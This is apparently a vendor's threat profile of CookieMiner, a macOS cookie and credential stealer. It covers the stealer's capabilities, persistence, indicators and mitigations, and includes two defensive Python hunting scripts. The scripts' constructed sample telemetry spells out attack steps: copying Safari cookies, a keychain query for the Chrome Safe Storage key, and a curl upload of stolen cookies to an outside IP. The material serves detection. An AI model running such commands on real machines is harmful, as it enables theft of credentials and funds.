CookieMiner

Miner

⚠️ Overview

CookieMiner is a macOS-specific information stealer documented by Palo Alto Networks Unit 42 at the end of January 2019. It is believed to have been developed from OSX.DarthMiner, a Mac coin miner with a backdoor that Malwarebytes described in December 2018. The malware targets users of cryptocurrency exchanges: it exfiltrates browser cookies for exchange and wallet sites, saved Chrome credentials, iPhone text messages recovered from iTunes backups, and cryptocurrency wallet data, and it additionally installs a coin miner and a Python backdoor. It is categorized as a stealer and credential harvester operated by financially motivated actors. Unit 42 did not attribute it to a named group; the only geographic hint in the sample is that the miner is configured for Koto, a little-known cryptocurrency used mainly in Japan.

🔧 Technical Capabilities

The initial delivery vector was not established in the public reporting. Its predecessor DarthMiner was distributed as a pirated copy of the Adobe Zii cracking tool, and the same warez channel is the most likely route for CookieMiner. The core of the malware is a shell script rather than a compiled binary. It copies Safari's cookie store and keeps the cookies for Binance, Coinbase, Poloniex, Bittrex, Bitstamp, MyEtherWallet and any domain containing the string "blockchain", then uploads them to a remote server with curl. A bundled Python script extracts Chrome cookies and the saved usernames, passwords and card data in Chrome's Login Data; on macOS this requires reading the "Chrome Safe Storage" item from the login keychain, which is the decryption key for those files. The script also harvests iPhone text message databases from iTunes backups under ~/Library/Application Support/MobileSync/Backup and collects wallet data found on disk. Two components are persisted as launch agents in ~/Library/LaunchAgents: an xmrig2 miner configured to mine Koto (com.apple.rig2.plist) and an EmPyre backdoor (com.proxy.initialize.plist) that gives the operators command execution on the host. EmPyre is a Python post-exploitation agent whose stager is a base64-encoded Python launcher; the backdoor checks whether the Little Snitch firewall is running and stops if it is, which is its only evasion behaviour.
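The behaviours above (a script rather than a browser reading cookie and credential stores, a command-line keychain lookup for the Chrome Safe Storage key, and a curl upload of the collected files) are the host signals a defender can hunt for. The following is an added example, not code from the original page or from the Unit 42 report. The JSON-lines event shape (ts, exe, args, parent) is an assumption about the telemetry feed, and every path, host and timestamp in the sample events is constructed.

```python
"""Hunt for CookieMiner-style collection in macOS process-execution telemetry.

Added example for this profile, not code from the original page or from
Unit 42. The event shape (one JSON object per line with ts, exe, args and
parent) is an assumption; map your EDR or Endpoint Security feed onto it.
"""
import json
from typing import Iterable

# Browser credential stores and the iTunes backup folder the stealer reads.
# Only the owning browser or the backup tooling should touch them.
CREDENTIAL_STORES = (
    "Library/Cookies/",        # Safari cookie store
    "Cookies.binarycookies",   # the same store once copied elsewhere
    "Google/Chrome/",          # Chrome profile: Cookies, Login Data
    "Login Data",
    "MobileSync/Backup/",      # iPhone backups, including the SMS database
)
# Processes that legitimately own those stores.
BROWSER_PREFIXES = ("/Applications/Google Chrome.app/", "/Applications/Safari.app/")
# curl options that send local data to a remote host.
CURL_UPLOAD_FLAGS = {"-T", "--upload-file", "-F", "--form", "-d", "--data", "--data-binary"}


def classify(event: dict) -> list[str]:
    """Return zero or more findings for one process-execution event."""
    exe = event.get("exe", "")
    args = event.get("args", [])
    parent = event.get("parent", "?")
    if exe.startswith(BROWSER_PREFIXES):
        return []  # a browser reading its own profile is normal
    name = exe.rsplit("/", 1)[-1]
    findings = []
    touched = [a for a in args if any(s in a for s in CREDENTIAL_STORES)]
    if touched:
        if name == "curl" and CURL_UPLOAD_FLAGS & set(args):
            remote = next((a for a in args if "://" in a), "<unknown host>")
            findings.append(f"exfil: curl uploading {touched[0]} to {remote}")
        else:
            findings.append(f"collection: {name} read {touched[0]} (parent {parent})")
    # Chrome uses the Keychain API directly; a shell or script calling security(1)
    # for the Chrome Safe Storage item is decrypting cookies or saved passwords.
    if name == "security" and "find-generic-password" in args and any("Chrome" in a for a in args):
        findings.append(f"credential-access: security(1) lookup of Chrome Safe Storage key (parent {parent})")
    return findings


def hunt(lines: Iterable[str]) -> list[tuple[str, str]]:
    """Run classify() over JSON-lines telemetry and return (timestamp, finding) pairs."""
    results = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for finding in classify(event):
            results.append((event.get("ts", ""), finding))
    return results


# Constructed telemetry: three malicious events in the stealer's order of
# operations, then two benign ones. 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = """\
{"ts": "2019-01-15T10:02:11Z", "exe": "/bin/cp", "args": ["cp", "/Users/alice/Library/Cookies/Cookies.binarycookies", "/tmp/.store/"], "parent": "/bin/sh"}
{"ts": "2019-01-15T10:02:12Z", "exe": "/usr/bin/security", "args": ["security", "find-generic-password", "-wa", "Chrome"], "parent": "/usr/bin/python"}
{"ts": "2019-01-15T10:02:15Z", "exe": "/usr/bin/curl", "args": ["curl", "-F", "file=@/tmp/.store/Cookies.binarycookies", "http://203.0.113.10:8000/upload"], "parent": "/bin/sh"}
{"ts": "2019-01-15T10:03:00Z", "exe": "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome", "args": ["Google Chrome", "--type=utility"], "parent": "/sbin/launchd"}
{"ts": "2019-01-15T10:03:05Z", "exe": "/usr/bin/curl", "args": ["curl", "-sS", "https://updates.example.invalid/manifest.json"], "parent": "/Applications/ExampleSync.app/Contents/MacOS/sync-agent"}
"""

if __name__ == "__main__":
    for ts, finding in hunt(SAMPLE_EVENTS.splitlines()):
        print(ts, finding)
```

The three rules are deliberately independent so that a partial run of the stealer (cookies copied but the upload blocked, or the keychain query denied) still produces a finding. Backup software and sync clients that read the whole home directory will trip the collection rule; tune by parent process or code-signing identity rather than by path.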

📜 History & Notable Incidents

CookieMiner surfaced in late 2018 and was publicly described by Unit 42 at the end of January 2019, shortly after Malwarebytes' December 2018 write-up of the related OSX.DarthMiner. No high-profile victims have been publicly named, and no CVEs are associated with the malware itself: it runs because the user executes it, not by exploiting a system vulnerability. No law enforcement action has been reported for this strain.

🔍 Detection Indicators

File hashes, the exfiltration server address and the mining pool used by the analysed sample are listed in the Unit 42 report (https://unit42.paloaltonetworks.com/cookieminer-steals-cookies-for-cryptocurrency-accounts/); match on those rather than on values copied from secondary sources. Behavioural indicators: launch agent plists in ~/Library/LaunchAgents labelled com.apple.rig2 and com.proxy.initialize (Apple's own agents live under /System/Library/LaunchAgents, so any com.apple.* label in a user's LaunchAgents folder is itself a red flag); an xmrig2 process mining Koto; a shell or Python process, rather than a browser, reading ~/Library/Cookies/Cookies.binarycookies, Chrome's Cookies and Login Data files, or the MobileSync backup folder; a command-line security(1) find-generic-password query for the Chrome Safe Storage key; and curl uploading those files to an external host. Registry keys are not applicable on macOS.

☠️ Risk & Impact

The combination of what is stolen is what makes CookieMiner dangerous: a valid exchange session cookie, the saved password and the victim's SMS messages (where one-time codes arrive) together can let the operators log in and move funds even when the account uses SMS-based two-factor authentication, and cryptocurrency transfers are irreversible. Wallet data taken from disk exposes private keys directly. The coin miner adds CPU load and power cost, and the EmPyre backdoor gives the operators arbitrary command execution for follow-on theft. The affected parties are individual cryptocurrency investors and small trading businesses; no large-scale enterprise damage has been reported.

🛡️ Mitigation

Gatekeeper does not inspect shell or Python scripts, and FileVault protects data only at rest, so neither stops this malware. Practical defenses: avoid pirated software and cracking tools, the channel that delivered the related DarthMiner; log out of exchange and wallet sites rather than leaving sessions open, because a stolen cookie is only useful while the session is valid; use an app-based or hardware second factor rather than SMS, since the stealer collects iPhone text messages; encrypt iTunes backups so the SMS database is not readable from the Mac; review ~/Library/LaunchAgents for unexpected entries and treat a com.apple.* label there as malicious; and deploy endpoint rules for non-browser processes reading browser cookie and credential stores, command-line keychain queries for the Chrome Safe Storage item, curl uploads to unknown hosts, and the hashes and network IOCs published by Unit 42 (report: https://unit42.paloaltonetworks.com/cookieminer-steals-cookies-for-cryptocurrency-accounts/).
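A launch agent audit covering the persistence indicator in the Detection Indicators section and the "review ~/Library/LaunchAgents" advice above, written as an added example and not taken from the original page or from the Unit 42 report. It uses only the standard plistlib module; the label names in the sample plists are the ones from this profile, while every path, pool address and the benign agent are constructed.

```python
"""Audit ~/Library/LaunchAgents for the persistence pattern this profile describes.

Added example, not code from the original page or from the Unit 42 report.
It parses launch agent plists and flags three traits: a com.apple.* label
outside /System/Library/LaunchAgents (Apple's own agents never live in a user's
folder), a program that runs from a user-writable path, and an interpreter
launching a script from such a path. Sample plists are constructed.
"""
import plistlib
from pathlib import Path

# Locations a persistent agent should not need to execute from.
USER_WRITABLE_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/var/folders/", "/Users/")
INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "zsh", "osascript", "perl"}


def agent_argv(plist: dict) -> list[str]:
    """Return the argv launchd will run, whichever key the plist uses."""
    if "ProgramArguments" in plist:
        return [str(a) for a in plist["ProgramArguments"]]
    if "Program" in plist:
        return [str(plist["Program"])]
    return []


def audit_agent(plist: dict, location: str) -> list[str]:
    """Return human-readable findings for one parsed launch agent."""
    findings = []
    label = str(plist.get("Label", ""))
    if label.startswith("com.apple.") and not location.startswith("/System/Library/"):
        findings.append(f"label {label!r} impersonates Apple outside /System/Library")
    argv = agent_argv(plist)
    if argv:
        exe = argv[0]
        if exe.startswith(USER_WRITABLE_PREFIXES):
            findings.append(f"program {exe!r} runs from a user-writable path")
        if Path(exe).name in INTERPRETERS:
            dropped = [a for a in argv[1:] if a.startswith(USER_WRITABLE_PREFIXES)]
            if dropped:
                findings.append(f"interpreter {exe!r} runs dropped script {dropped[0]!r}")
    return findings


def audit_all(agents: dict[str, bytes]) -> dict[str, list[str]]:
    """Parse each plist (path -> raw bytes) and keep only those with findings."""
    report = {}
    for location, raw in agents.items():
        try:
            plist = plistlib.loads(raw)
        except Exception:  # malformed or truncated plist: surface it, do not skip it
            report[location] = ["plist does not parse"]
            continue
        findings = audit_agent(plist, location)
        if findings:
            report[location] = findings
    return report


def scan_directory(directory: Path) -> dict[str, list[str]]:
    """Audit every .plist in a real LaunchAgents folder on a live Mac."""
    return audit_all({str(p): p.read_bytes() for p in directory.glob("*.plist")})


# Constructed samples. The first two mimic the shape of the miner and backdoor
# agents (labels from the profile, paths made up); the third is a benign vendor agent.
SAMPLE_AGENTS = {
    "/Users/alice/Library/LaunchAgents/com.apple.rig2.plist": plistlib.dumps({
        "Label": "com.apple.rig2",
        "ProgramArguments": ["/tmp/xmrig2", "-o", "stratum+tcp://pool.example.invalid:3333"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "/Users/alice/Library/LaunchAgents/com.proxy.initialize.plist": plistlib.dumps({
        "Label": "com.proxy.initialize",
        "ProgramArguments": ["/usr/bin/python", "/Users/alice/Library/.hidden/agent.py"],
        "RunAtLoad": True,
    }),
    "/Users/alice/Library/LaunchAgents/com.example.sync.plist": plistlib.dumps({
        "Label": "com.example.sync",
        "ProgramArguments": ["/Applications/ExampleSync.app/Contents/MacOS/sync-agent", "--background"],
        "RunAtLoad": True,
    }),
}

if __name__ == "__main__":
    for location, findings in audit_all(SAMPLE_AGENTS).items():
        print(location)
        for f in findings:
            print("  -", f)
    # On a live system: scan_directory(Path.home() / "Library" / "LaunchAgents")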

Free Threat Visibility

Get Visibility Into Automated Threats Reaching Your Server

Boteraser's behavioral analysis identifies bot traffic patterns — giving you insight into automated activity that may be scanning or probing your web infrastructure.

🔍 Scan My Site Free

Powered by JA4 fingerprinting, honeypot traps & behavioral analysis

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.